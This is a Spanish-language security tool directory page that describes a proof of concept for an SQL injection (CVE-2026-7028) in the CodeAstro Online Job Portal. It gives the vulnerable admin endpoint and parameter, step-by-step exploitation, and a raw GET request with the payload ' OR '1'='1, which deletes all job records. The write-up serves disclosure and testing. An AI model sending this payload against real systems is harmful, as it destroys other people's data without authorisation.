Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/xmyronn/cve-2026-7028-sqli
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubxmyronn/cve-2026-7028-sqli

CVE-2026-7028-SQLI

Prueba de concepto de explotación de inyección SQL en CodeAstro Online Job Portal que permite la eliminación autenticada de todos los registros de empleo mediante una solicitud GET manipulada.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CodeAstro-Online-Job-Portal-SQLi-Delete-All

Detalles

  • Proveedor: CodeAstro
  • Producto: Proyecto de Portal de Empleo en Línea en PHP MySQL
  • Versión: 1.0
  • Tipo de vulnerabilidad: Inyección SQL
  • CWE: CWE-89
  • Endpoint afectado: /admin/jobs-admins/delete-jobs.php
  • Parámetro: id (GET)
  • Impacto: Permite la eliminación de todos los registros de empleos en la base de datos

Descripción

Se identificó una vulnerabilidad de inyección SQL en la función de eliminación de empleos del administrador en el Portal de Empleo en Línea de CodeAstro.

La aplicación utiliza el parámetro id directamente en la consulta SQL sin una validación adecuada ni vinculación de parámetros. Debido a esto, un atacante puede modificar la consulta inyectando entrada maliciosa.

Al explotar este problema, un usuario autenticado puede alterar la lógica de la consulta prevista y eliminar todos los registros de empleos de la base de datos en lugar de solo una entrada.

Prueba de Concepto

Paso 1: Iniciar sesión como Administrador

Inicie sesión en el panel de administración.

Paso 2: Navegar a la Sección de Empleos

Vaya a: /admin/jobs-admins/show-jobs.php Screenshot 2026-04-06 205206

Verifique que existan múltiples entradas de empleos.

Paso 3: Explotar la Vulnerabilidad

Envíe la siguiente solicitud:

GET /admin/jobs-admins/delete-jobs.php?id=48' OR '1'='1 HTTP/1.1
Host: target Screenshot 2026-04-06 205239

Paso 4: Observar el Resultado

Todas las entradas de empleos se eliminan de la base de datos en lugar de solo una. Screenshot 2026-04-06 205252

Payload

' OR '1'='1

Impacto

Un atacante autenticado puede eliminar todas las ofertas de empleo del sistema, lo que provoca una pérdida total de datos y la interrupción del servicio.

Referencia

https://codeastro.com/online-job-portal-project-in-php-mysql-with-source-code/

Descargar herramienta